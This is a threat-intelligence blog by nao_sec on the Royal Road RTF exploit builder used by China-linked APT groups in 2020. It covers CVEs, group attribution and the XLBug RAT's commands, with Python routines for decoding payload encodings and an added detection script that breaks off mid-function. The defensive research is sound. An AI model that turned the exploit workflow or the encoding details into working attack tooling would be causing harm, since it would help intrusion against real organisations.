The malware executed was an unknown RAT, which we call XLBug RAT because of characteristics left in it. The RAT holds information such as the C&C server, encoded with Base64 and XOR. The following commands are implemented in XLBug RAT:

- Get directory information
- Get file information
- Get computer information
- Execute file
- Upload file
- Download file
- Rename file
- Delete file
- Delete itself

The naming convention and encoding of the encoded object contained in the RTF are similar to those of TA428. However, we cannot say that this was a TA428 attack.

Relationship

In the previous blog, we summarized the characteristics of attack groups that use Royal Road and used them to divide the groups into two clusters. However, by 2020 those characteristics have become almost meaningless: they have been standardized or removed. It is not as easy to group as it used to be. In the first place, the groups sharing Royal Road should be close to each other. We do not classify further, but if you have any comments, please let us know.

Yara Rule

The GitHub repository we shared in the previous blog is still being updated.
https://github.com/nao-sec/yara_rules

IOC

The IOC sheet shared in the previous blog is still being updated.
https://nao-sec.org/jsac2020_ioc.html

Tool

The tool for decoding objects encoded by Royal Road is still being updated.
https://github.com/nao-sec/rr_decoder

Wrap-Up

Attacks using Royal Road have decreased compared to 2019, but are still ongoing. There are many cases of attacks by TA428 and Tonto, but attacks by other groups (Higaisa, Vicious Panda, FunnyDream, TA410) have also been observed. Attacks on Japan have also been observed, and we were unable to attribute them to a known attack group. The use of Royal Road by such unknown attack groups is expected to continue. In addition to Royal Road, there are other cases, such as the Tmanger family, in which tools appear to be shared among multiple targeted attack groups. We should continue to pay close attention to these tool-sharing cases.

Acknowledgments

“nao_sec” is an independent research team that does not belong to any company. Its members belong to their respective companies and engage in research there, but nao_sec’s activities remain independent of those companies. We are grateful to all of you who cooperate with our research activities every day.

References

[1] nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
[2] NTT Security Japan, “Operation LagTime IT: colourful Panda footprint”, https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf
[3] NTT Security Japan, “Panda’s New Arsenal: Part 1 Tmanger”, https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger
[4] NTT Security Japan, “Panda’s New Arsenal: Part 2 Albaniiutas”, https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas
[5] NTT Security Japan, “Panda’s New Arsenal: Part 3 Smanager”, https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager
[6] CheckPoint Research, “Naikon APT: Cyber Espionage Reloaded”, https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/
[7] Tencent, “APT攻击组织”黑格莎(Higaisa)”攻击活动披露”, https://s.tencent.com/research/report/836.html
[8] Tencent, ““Higaisa(黑格莎)”组织近期攻击活动报告”, https://s.tencent.com/research/report/895.html
[9] Positive Technologies, “COVID-19 и новогодние поздравления: исследуем инструменты группировки Higaisa”, https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/covid-19-i-novogodnie-pozdravleniya-issleduem-instrumenty-gruppirovki-higaisa/
[10] NTT Security Japan, “Crafty Panda 標的型攻撃解析レポート”, https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report
[11] Cylance (BlackBerry), “The Ghost Dragon”, https://blogs.blackberry.com/en/2016/04/the-ghost-dragon
[12] Palo Alto Networks, “PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia”, https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/
[13] CheckPoint Research, “Vicious Panda: The COVID
Campaign”, https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ [14] BitDefender, “A Detailed Timeline of a Chinese APT Espionage Attack Targeting South Eastern Asian Government Institutions”, https://labs.bitdefender.com/2020/11/a-detailed-timeline-of-a-chinese-apt-espionage-attack-targeting-south-eastern-asian-government-institutions/ [15] Proofpoint, “LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards”, https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks [16] Proofpoint, “LookBack Forges Ahead: Continued Targeting of the United States’ Utilities Sector Reveals Additional Adversary TTPs”, https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals [17] Proofpoint, “TA410: The Group Behind LookBack Attacks Against U.S. Utilities Sector Returns with New Malware”, https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
    <p><img src="https://nao-sec.org/assets/2021-01-05/00.png" alt="" /></p> <h2 id="abstract">Abstract</h2> <p>We introduced the “Royal Road RTF Weaponizer” in our previous blog [1] (and presented it at Japan Security Analyst Conference 2020 and CPX 360 CPRCon 2020). Royal Road is a tool shared by many targeted attack groups believed to belong to China. A year has passed since that blog, and Royal Road is still in use. Here we introduce the Royal Road-related attacks we observed during 2020.</p> <h2 id="previous-blog">Previous Blog</h2> <p>Let’s briefly review the previous blog. Royal Road is a tool that generates RTF files exploiting the Microsoft Office Equation Editor vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802). The details of the tool itself are unknown, but the RTF files it generates have various recognizable characteristics. Because the definition of an “RTF file generated by Royal Road” varies from researcher to researcher, we define it as a file that meets both of the following conditions.</p> <ol> <li>It exploits a vulnerability in Microsoft Office Equation Editor</li> <li>It contains an object named “8.t”</li> </ol> <p>Some RTF files are very likely related to Royal Road even though they do not meet the second condition. For classification purposes we call these “Related Samples”. They may in fact also have been generated by Royal Road, but only the attacker knows. So, for the purposes of our research, we divide files into “Royal Road Samples” and “Related Samples”; in the case studies below they are treated the same.</p> <p>Royal Road is shared among various attack groups believed to belong to China. Specifically, it is believed to be used by the following groups. Aliases are given for reference; strictly speaking they are not always equivalent. For example, TA428 and Pirate Panda are not exactly the same.</p> <ol> <li>Temp.Tick (BRONZE BUTLER, RedBaldKnight)</li> <li>Temp.Conimes (Goblin Panda, Cycldek)</li> <li>Temp.Periscope (Leviathan, APT40)</li> <li>Temp.Trident (Dagger Panda, IceFog)</li> <li>Tonto (Karma Panda, CactusPete, LoneRanger)</li> <li>TA428 (Pirate Panda)</li> <li>Rancor</li> </ol> <p>We also categorized the various characteristics of the RTF files used by these groups and showed what they have in common.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/01.png" alt="" /></p> <h2 id="updates">Updates</h2> <p>A year has passed since we introduced Royal Road. In the meantime, RTF files believed to have been generated by Royal Road have been used many times in targeted attacks, and several updates have been observed. First, we introduce those updates.</p> <p>An RTF file generated by Royal Road contains the encoded malware; after exploitation, the shellcode decodes it. In our previous blog we introduced the following five encodings, each identified by the first four bytes of the encoded object (the encoded form of the PE header 4D 5A 90 00).</p> <ol> <li>4D 5A 90 00 (not encoded)</li> <li>F2 A3 20 72</li> <li>B2 A6 6D FF</li> <li>B0 74 77 46</li> <li>B2 5A 6F 00</li> </ol> <p>Many of the RTF files we observed in 2020 used the 3rd and 4th encodings. However, a few samples used the following two new encodings.</p> <ol start="6"> <li>A9 A4 6E FE</li> </ol> <p><img src="https://nao-sec.org/assets/2021-01-05/02.png" alt="" /></p> <p>This encoding can be decoded with code like the following:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># enc_data: the encoded object extracted from the RTF (a bytes object)
dec_data = bytearray()
for b in enc_data:
    # XOR each byte with 0x7b, then add 0x7b modulo 256
    dec_data.append(((b ^ 0x7b) + 0x7b) % 256)
</code></pre></div></div> <ol start="7"> <li>94 5F DA D8</li> </ol> <p><img src="https://nao-sec.org/assets/2021-01-05/03.png" alt="" /></p> <p>This encoding can be decoded with code like the following:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># enc_data: the encoded object extracted from the RTF (a bytes object)
dec_data = bytearray()
xor_key = 1387678300  # 0x52B64A5C, initial state of the key register
for b in enc_data:
    # clock the key register seven times per byte; its low byte is the XOR key
    for _ in range(7):
        x0 = (xor_key &amp; 0x20000000) == 0x20000000
        x1 = (xor_key &amp; 8) == 8
        x2 = xor_key &amp; 1
        x3 = 1 + (x0 ^ x1 ^ x2)
        # mask to 32 bits so the integer does not grow without bound;
        # only the low bits feed back, so the output is unchanged
        xor_key = ((xor_key + xor_key) + x3) &amp; 0xFFFFFFFF
    dec_data.append(b ^ (xor_key % 256))
</code></pre></div></div> <p>Our tool for decoding objects encoded by Royal Road is already available on GitHub. 
It also supports the above new encodings.</p> <p><a href="https://github.com/nao-sec/rr_decoder">https://github.com/nao-sec/rr_decoder</a></p> <h2 id="new-attack-groups">New Attack Groups</h2> <p>As mentioned earlier, several attack groups use Royal Road. The following eight groups were observed using it (counting both Royal Road Samples and Related Samples) during 2020.</p> <ol> <li>Temp.Conimes</li> <li>Tonto</li> <li>TA428</li> <li>Naikon</li> <li>Higaisa</li> <li>Vicious Panda</li> <li>FunnyDream</li> <li>TA410</li> </ol> <p>We already reported on groups 1-3 in our previous blog. Temp.Conimes used NewCore RAT to attack Vietnamese organizations. Tonto used Bisonal to attack organizations in East Asia, including Russia.</p> <p>TA428 was particularly active, using PoisonIvy, Cotx RAT, Tmanger and nccTrojan to attack East Asian organizations, including in Mongolia. We do not cover these individual cases here; if you are interested, see the IOC section. For TA428, the paper [2] and blogs [3][4][5] published by NSJ (NTT Security Japan) are available.</p> <p>For Naikon, CheckPoint Research published a report [6], but unfortunately we could not observe this activity ourselves. Therefore, in the following, we introduce Royal Road-related attack cases for the remaining four groups (5-8).</p> <h3 id="higaisa">Higaisa</h3> <p>Higaisa is an attack group that appears to have been active since at least around 2016. Its targets are mainly organizations related to North Korea, and it is believed to aim at information theft using AttackBot, PIZ Stealer and Gh0st RAT.</p> <p>Blogs about the group have been written by Tencent and Positive Technologies [7][8][9], which attribute it to (South) Korea. However, NSJ’s paper [10] showed a connection with Ghost Dragon [11] and PKPLUG [12] and reported that it might belong to China.</p> <p>We observed a Higaisa attack using Royal Road in March 2020.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/04.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/05.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/06.png" alt="" /></p> <p>The malware executed by the Royal Road RTF was AttackBot, a downloader that Higaisa has used since at least April 2018.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/07.png" alt="" /></p> <h3 id="vicious-panda">Vicious Panda</h3> <p>Vicious Panda is an attack group reported by CheckPoint Research in March 2020 [13]. It is said to belong to China and to target Russia, Mongolia and Ukraine, among others.</p> <p>We observed a Vicious Panda attack using Royal Road in March 2020.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/08.png" alt="" /></p> <p>It has been reported to execute malware similar to Enfal and BYEBY.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/09.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/10.png" alt="" /></p> <h3 id="funnydream">FunnyDream</h3> <p>FunnyDream is an attack group said to have been active since around 2018. It is said to belong to China and targets Southeast Asian countries such as Vietnam and Malaysia. FunnyDream uses Chinoxy and the FunnyDream backdoor. BitDefender has published a detailed report [14] on FunnyDream.</p> <p>We observed FunnyDream attacks from March to May 2020.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/11.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/12.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/13.png" alt="" /></p> <p>Chinoxy is a RAT that FunnyDream has used since around 2018. It decodes its configuration using two numeric values and communicates with the C&amp;C server over a custom protocol that uses Blowfish.</p> <h3 id="ta410">TA410</h3> <p>TA410 is an attack group said to have been active since around 2016. It is said to belong to China and is suspected of being related to APT10. Proofpoint has published reports on it [15][16][17]; it mainly targets the United States, in particular the utilities sector. It uses malware called LookBack and FlowCloud.</p> <p>We observed a TA410 attack in October 2020.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/15.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/16.png" alt="" /></p> <p>FlowCloud is a RAT reported by Proofpoint in June 2020. Versions 4 and 5 of FlowCloud have been reported; the FlowCloud we observed this time was similar to v4.</p> <h2 id="attack-case-against-japan">Attack case against Japan</h2> <p>In addition to the attacks by the four groups shown so far (Higaisa, Vicious Panda, FunnyDream, TA410), we also observed other attacks that appear to be related to Royal Road. Among them, we introduce an example of an attack on Japan. We are not able to identify which attack group carried it out; if you have any knowledge about it, please share it with us.</p> <p>The attack on Japan took place in November 2020. It began with two RTF files attached to an email.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/18.png" alt="" /></p> <p><img src="https://nao-sec.org/assets/2021-01-05/19.png" alt="" /></p> <p>These RTF files did not contain an 8.t object, but they did contain a related object: the malware, encoded with the 4th encoding (B0 74 77 46) shown above.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/20.png" alt="" /></p> <p>The overall picture of the attack is as follows.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/21.png" alt="" /></p> <p>The malware executed was a previously unknown RAT. We call it XLBug RAT because of artifacts left in the RAT. It holds information such as the C&amp;C server address encoded with Base64 and XOR.</p> <p><img src="https://nao-sec.org/assets/2021-01-05/22.png" alt="" /></p> <p>The following commands are implemented in XLBug RAT.</p> <ul> <li>Get directory information</li> <li>Get file information</li> <li>Get computer information</li> <li>Execute file</li> <li>Upload file</li> <li>Download file</li> <li>Rename file</li> <li>Delete file</li> <li>Delete itself</li> </ul> <p>The naming convention and encoding of the encoded object contained in the RTF are similar to those of TA428. However, we cannot say that this was a TA428 attack.</p> <h2 id="relationship">Relationship</h2> <p>In the previous blog, we summarized the characteristics of the attack groups that use Royal Road and used them to divide the groups into two clusters. By 2020, however, those characteristics have become almost meaningless: they have been standardized or removed, and grouping is no longer as easy as it used to be. In the first place, groups that share Royal Road are presumably already close to each other. We do not classify them further here, but if you have any comments, please let us know.</p> <h2 id="yara-rule">Yara Rule</h2> <p>The GitHub repository we shared in the previous blog is still being updated.</p> <p><a href="https://github.com/nao-sec/yara_rules">https://github.com/nao-sec/yara_rules</a></p> <h2 id="ioc">IOC</h2> <p>The IOC sheet shared in the previous blog is still being updated.</p> <p><a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a></p> <h2 id="tool">Tool</h2> <p>Our tool for decoding objects encoded by Royal Road is still being updated.</p> <p><a href="https://github.com/nao-sec/rr_decoder">https://github.com/nao-sec/rr_decoder</a></p> <h2 id="wrap-up">Wrap-Up</h2> <p>Attacks using Royal Road have decreased compared to 2019 but are still ongoing. Many are by TA428 and Tonto, but attacks by other groups (Higaisa, Vicious Panda, FunnyDream, TA410) have also been observed.</p> <p>Attacks on Japan have also been observed, and we were unable to link them to a known attack group. The use of Royal Road by such unidentified groups is expected to continue.</p> <p>Besides Royal Road, there are other cases, such as the Tmanger family, in which tools appear to be shared among multiple targeted attack groups. We should continue to pay close attention to such tool-sharing cases.</p> <h2 id="acknowledgments">Acknowledgments</h2> <p>“nao_sec” is an independent research team that does not belong to any company. Its members belong to their respective companies and do research there, but the activities of nao_sec remain independent of those companies. We are grateful to everyone who cooperates with our research activities every day.</p> <hr /> <h2 id="references">References</h2> <p>[1] nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html<br /> [2] NTT Security Japan, “Operation LagTime IT: colourful Panda footprint”, https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf<br /> [3] NTT Security Japan, “Panda’s New Arsenal: Part 1 Tmanger”, https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger<br /> [4] NTT Security Japan, “Panda’s New Arsenal: Part 2 Albaniiutas”, https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas<br /> [5] NTT Security Japan, “Panda’s New Arsenal: Part 3 Smanager”, https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager<br /> [6] CheckPoint Research, “Naikon APT: Cyber Espionage Reloaded”, https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/<br /> [7] Tencent, “APT攻击组织”黑格莎(Higaisa)”攻击活动披露” (Disclosure of the attack activity of the APT group “Higaisa”), https://s.tencent.com/research/report/836.html<br /> [8] Tencent, ““Higaisa(黑格莎)”组织近期攻击活动报告” (Report on the recent attack activity of the “Higaisa” group), https://s.tencent.com/research/report/895.html<br /> [9] Positive Technologies, “COVID-19 и новогодние поздравления: исследуем инструменты группировки Higaisa” (COVID-19 and New Year greetings: examining the Higaisa group’s tools), https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/covid-19-i-novogodnie-pozdravleniya-issleduem-instrumenty-gruppirovki-higaisa/<br /> [10] NTT Security Japan, “Crafty Panda 標的型攻撃解析レポート” (Crafty Panda targeted attack analysis report), https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report<br /> [11] Cylance (BlackBerry), “The Ghost Dragon”, https://blogs.blackberry.com/en/2016/04/the-ghost-dragon<br /> [12] Palo Alto Networks, “PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia”, https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/<br /> [13] CheckPoint Research, “Vicious Panda: The COVID Campaign”, https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/<br /> [14] BitDefender, “A Detailed Timeline of a Chinese APT Espionage Attack Targeting South Eastern Asian Government Institutions”, https://labs.bitdefender.com/2020/11/a-detailed-timeline-of-a-chinese-apt-espionage-attack-targeting-south-eastern-asian-government-institutions/<br /> [15] Proofpoint, “LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards”, https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks<br /> [16] Proofpoint, “LookBack Forges Ahead: Continued Targeting of the United States’ Utilities Sector Reveals Additional Adversary TTPs”, https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals<br /> [17] Proofpoint, “TA410: The Group Behind LookBack Attacks Against U.S. Utilities Sector Returns with New Malware”, https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new</p>
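<p>A worked example for the Updates section of the post above: the two routines shown there decode the objects whose first four bytes are A9 A4 6E FE and 94 5F DA D8, and those four bytes are exactly what the post uses to name each encoding, because every decoded object starts with the PE header 4D 5A 90 00. The script below is an added example, not code from nao_sec or from rr_decoder. It dispatches on the marker, applies the matching routine and checks that the result starts with the PE header. The sample input is fabricated inline by running the routines in reverse on a made-up DOS header; the function names, the marker dispatch and the 32-bit masking of the key register are choices made here, not part of the original post.</p>

```python
"""Marker-based identification and decoding of Royal Road encoded objects.

Added example. The two decoding routines follow the logic shown in the post;
the dispatch by marker, the PE-header check and the encoder are additions
made here for illustration.
"""

# Every decoded object is a PE file, so each marker is the encoded form of "MZ\x90\x00".
MZ_HEADER = b"MZ\x90\x00"
MARKER_XOR_ADD = bytes.fromhex("A9A46EFE")
MARKER_SHIFT_REG = bytes.fromhex("945FDAD8")


def decode_xor_add_7b(enc):
    """Encoding marked A9 A4 6E FE: XOR each byte with 0x7b, then add 0x7b (mod 256)."""
    return bytes(((b ^ 0x7B) + 0x7B) & 0xFF for b in enc)


def encode_xor_add_7b(plain):
    """Inverse of decode_xor_add_7b; used here only to build sample input."""
    return bytes(((b - 0x7B) & 0xFF) ^ 0x7B for b in plain)


def decode_shift_register(enc, seed=1387678300):
    """Encoding marked 94 5F DA D8.

    A key register seeded with 1387678300 (0x52B64A5C) is shifted left seven
    times per input byte. Each shift feeds bits 29, 3 and 0 of the register
    back into its low end; the low byte of the register is then XORed with
    the input byte. XOR is its own inverse, so this routine also encodes.
    """
    key = seed
    out = bytearray()
    for b in enc:
        for _ in range(7):
            feedback = ((key >> 29) & 1) ^ ((key >> 3) & 1) ^ (key & 1)
            # The mask keeps the integer at 32 bits. Only the low bits feed back
            # and carries propagate upward, so the keystream is unaffected.
            key = ((key << 1) + 1 + feedback) & 0xFFFFFFFF
        out.append(b ^ (key & 0xFF))
    return bytes(out)


DECODERS = {
    MZ_HEADER: lambda data: data,  # "4D 5A 90 00 (not encoded)"
    MARKER_XOR_ADD: decode_xor_add_7b,
    MARKER_SHIFT_REG: decode_shift_register,
}


def decode_object(enc):
    """Return (marker_hex, decoded_bytes); raise ValueError on an unknown marker
    or when the decoded data is not a PE file.

    The marker is simply the first four bytes of the object as stored in the RTF.
    """
    marker = bytes(enc[:4])
    decoder = DECODERS.get(marker)
    if decoder is None:
        raise ValueError("unknown encoding marker %s" % marker.hex().upper())
    decoded = decoder(enc)
    if not decoded.startswith(MZ_HEADER):
        raise ValueError("decoded object does not start with a PE header")
    return marker.hex().upper(), decoded


# Constructed sample: a fabricated DOS header, not a real payload.
SAMPLE_PE = MZ_HEADER + b"\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
SAMPLE_XOR_ADD = encode_xor_add_7b(SAMPLE_PE)        # begins with A9 A4 6E FE
SAMPLE_SHIFT_REG = decode_shift_register(SAMPLE_PE)  # begins with 94 5F DA D8

if __name__ == "__main__":
    for sample in (SAMPLE_PE, SAMPLE_XOR_ADD, SAMPLE_SHIFT_REG):
        marker, decoded = decode_object(sample)
        print(marker, "->", decoded[:4].hex().upper(), decoded == SAMPLE_PE)
```

<p>Running the script prints the marker of each sample, the first four decoded bytes (always 4D5A9000) and whether the round trip reproduced the fabricated header. rr_decoder remains the maintained tool for real samples; the point of this script is only to show how the marker bytes, the routines and the PE-header check fit together.</p>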
  59. An Overhead View of the Royal Road

    Wed, 29 Jan 2020 15:00:00 -0000

    <h2 id="abstract">Abstract</h2> <p>Several targeted attack groups share the tools used in their attacks and are reported to carry out similar attacks. Attack tools are also shared in attacks targeting Japanese organizations, for example by Tick. Tick may use a tool called the Royal Road RTF Weaponizer, and Royal Road is also used by targeted attack groups such as Goblin Panda and Temp.Trident that are suspected of being linked to China.</p> <p>In this blog, we focus on Royal Road and introduce the features of the tool: an outline of the tool, its behavior, and the exploited vulnerabilities. Next, the targeted attack groups that use Royal Road are listed, and each attack case is shown in detail. We have collected over 100 malicious documents since 2018 and investigated the malware deployed and downloaded from them. Even among groups using the same Royal Road, we attributed them based on the target country/organization, the technique used for the attack, the malware executed, etc.</p> <p>The countries/organizations targeted for attack are varied, mainly in Asia. Such information has been published by researchers all over the world, but it is not widely known that Royal Road is used in Tick attacks targeting Japanese organizations. Attacks using Royal Road are still active in 2019. We share analysis results of malicious documents and malware based on the cases we observed. Other targeted attack groups may also be related to Royal Road. We introduce the attack cases of these groups and show how they are related.</p> <p>Finally, we show a hunting technique that uses the characteristics of RTF files built with Royal Road and the techniques preferred by the targeted attack groups that use it. This blog will help researchers who are researching and analyzing targeted attacks, as well as CSIRT/SOC members, to understand the attacks and take countermeasures.</p> <h2 id="summary">Summary</h2> <h3 id="royal-road">Royal Road</h3> <p>Royal Road is an RTF weaponizer named by Anomali. It is sometimes called the “8.t RTF exploit builder”. This tool is not OSS, but it is shared between multiple actors.</p> <p>We define the RTFs generated by Royal Road as those satisfying the following two conditions:</p> <ol> <li>They exploit a vulnerability in the Equation Editor</li> <li>They have an object named 8.t in the RTF</li> </ol> <p>Royal Road behaves as follows.</p> <ol> <li> <p>The RTF creates a file (8.t) using the ActiveX Control “Package” when the document is opened</p> </li> <li>All vulnerabilities used by the exploit code are in the Equation Editor: <ul> <li>CVE-2017-11882</li> <li>CVE-2018-0798</li> <li>CVE-2018-0802</li> </ul> </li> <li>It decodes 8.t and executes the malware, by DLL side-loading, etc.</li> </ol> <p><img src="https://nao-sec.org/assets/2020-01-30/behavior.png" alt="" /></p> <p>The v1-v5 classification was defined by Proofpoint and Anomali and published at VB2019. We did further research on the RTF objects. RTF analysis showed that there is a special byte sequence immediately before the shellcode. We call that an object pattern. The 8.t encoding is not distinguished by version; we consider it an actor distinction rather than a tool distinction.</p> <p>As for v3, RTFs including 8.t could not be found in our survey, so we define this as Royal Road-related, not Royal Road.</p> <p>We define new versions for v6 and later. The object string has changed a little since v5, but it is basically the same. v7 has a very different object string. The v7 object pattern is the same as in v4-v6, but part of the object data is randomized.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/version.png" alt="" /></p> <h3 id="for-attribution">For attribution</h3> <ul> <li>Time <ul> <li>submission to public service</li> <li>RTF creation</li> </ul> </li> <li>Target country <ul> <li>decoy file language</li> </ul> </li> <li>RTF characteristics <ul> <li>Object strings</li> <li>Object patterns</li> <li>Package patterns</li> <li>Object name, Path</li> </ul> </li> <li>Payload encoding patterns</li> <li>Dropped file name</li> <li>Malware execution techniques <ul> <li>T1137 (Office Application Startup)</li> <li>T1073 (DLL Side-Loading)</li> </ul> </li> <li>Final payload (malware family)</li> </ul> <h3 id="actors">Actors</h3> <p>Here are the actors that have been confirmed to use Royal Road. All of them are suspected of being linked to China.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/actor1.png" alt="" /> <img src="https://nao-sec.org/assets/2020-01-30/actor2.png" alt="" /></p> <p>These tables summarize each actor’s characteristics. We categorize these actors into three groups.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/actor_details.png" alt="" /></p> <h3 id="group">Group</h3> <ul> <li>Group-A is Conimes, Periscope and Rancor.</li> <li>Group-B is Trident, Tick, TA428 and Tonto.</li> <li>Group-C is an actor we have not identified.</li> </ul> <p><img src="https://nao-sec.org/assets/2020-01-30/group.png" alt="" /></p> <p>Group-A targets Southeast Asia. Periscope and Conimes were active at the same time and share the same techniques. Conimes and Rancor were also active at the same time and share some techniques. We believe these groups are close and may share tools and insights.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/groupA.png" alt="" /></p> <p>Group-B includes Trident, Tick, TA428 and Tonto. These actors target East Asia, especially Russia, Korea and Japan. Tick, TA428 and Tonto may use the same techniques. Tick and Tonto in particular are very similar. We believe that the Group-B actors are very close and share techniques and insights.</p> <p><img src="https://nao-sec.org/assets/2020-01-30/groupB.png" alt="" /></p> <h3 id="wrap-up">Wrap-up</h3> <p>RTF files created with Royal Road exploit a vulnerability in the Equation Editor. The RTF files have a variety of characteristics that help with attribution. Many actors use Royal Road. We can divide them into three groups and infer connections between actors.</p> <h3 id="appendix">Appendix</h3> <h4 id="appendix-1-ioc">Appendix-1: IOC</h4> <ul> <li><a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a></li> </ul> <h4 id="appendix-2-tool">Appendix-2: Tool</h4> <ul> <li><a href="https://github.com/nao-sec/rr_decoder">rr_decoder</a></li> <li><a href="https://github.com/nao-sec/yara_rules">Yara Rules</a></li> </ul> <hr /> <p>Full report is here: <a href="https://github.com/nao-sec/materials/raw/master/JSAC%2BCPRCon2020/An_Overhead_View_of_the_Royal_Road.pdf">[PDF (EN)]</a></p>
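    <p>The two conditions in the summary (an Equation Editor object, and an embedded object named 8.t) can be turned directly into a first-pass hunting check over a corpus of RTFs. The following is an added example written for this page, not code from the nao_sec post or from rr_decoder: it decodes every <code>\*\objdata</code> hex blob in an RTF, reads the class name from the preceding <code>\*\objclass</code> group, and flags the file only when one object is an Equation Editor object and a Package object carries the file name 8.t. The sample RTF is constructed inline; its leading OLE bytes are placeholders rather than a real Package stream, and the parser does not cope with the control-word noise that real Royal Road samples often add around the object data.</p>

```python
"""Added example: a first-pass hunt for RTFs matching the two Royal Road conditions
(an Equation Editor object plus an embedded object named 8.t). Not the nao_sec
rr_decoder; the sample RTF below is constructed for this demonstration."""
import binascii
import re

# Hex blob that follows \*\objdata, up to the closing brace of its group.
OBJDATA_RE = re.compile(rb"\\\*\\objdata\s*([0-9a-fA-F\s]*?)\}")
# Class name of the object, e.g. {\*\objclass Equation.3} or {\*\objclass Package}.
OBJCLASS_RE = re.compile(rb"\\\*\\objclass\s+([^}\\\s]+)")

EQUATION_MARKERS = (b"Equation.3", b"Equation.2", b"Equation Native")
# An OLE Package object stores the embedded file's name as a NUL-terminated ASCII string.
ROYAL_ROAD_NAME = b"8.t\x00"


def extract_objects(rtf: bytes) -> list:
    """Return (objclass, decoded object bytes) for every embedded object in the RTF.
    objclass is b'' when no \\*\\objclass group precedes the data."""
    objects = []
    for match in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", match.group(1))
        if len(hexdata) % 2:  # tolerate a truncated trailing nibble
            hexdata = hexdata[:-1]
        try:
            data = binascii.unhexlify(hexdata)
        except binascii.Error:
            continue
        # The class group normally sits just before the data group; take the nearest one.
        preceding = rtf[max(0, match.start() - 256):match.start()]
        classes = OBJCLASS_RE.findall(preceding)
        objects.append((classes[-1] if classes else b"", data))
    return objects


def classify_rtf(rtf: bytes) -> dict:
    """Apply the two Royal Road conditions from the summary above."""
    objects = extract_objects(rtf)
    equation = any(any(m in cls or m in data for m in EQUATION_MARKERS) for cls, data in objects)
    drops_8t = any(cls == b"Package" and ROYAL_ROAD_NAME in data for cls, data in objects)
    return {
        "objects": len(objects),
        "equation_editor": equation,
        "drops_8t": drops_8t,
        "royal_road": equation and drops_8t,
    }


def build_sample_rtf(drop_name: bytes, with_equation: bool) -> bytes:
    """Construct a minimal RTF in the shape the page describes. Constructed test input only:
    the leading OLE bytes are placeholders, not a real Package or Equation stream."""
    package_blob = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"Package\x00"
                    + drop_name + b"\x00" + b"\x00" * 8)
    objects = [(b"Package", package_blob)]
    if with_equation:
        objects.append((b"Equation.3", b"Equation Native\x00" + b"\x41" * 16))
    parts = [b"{\\rtf1\\ansi"]
    for cls, blob in objects:
        hexdata = binascii.hexlify(blob)
        # Word writes the hex in short lines; keep that habit so the parser is exercised on it.
        lines = b"\r\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
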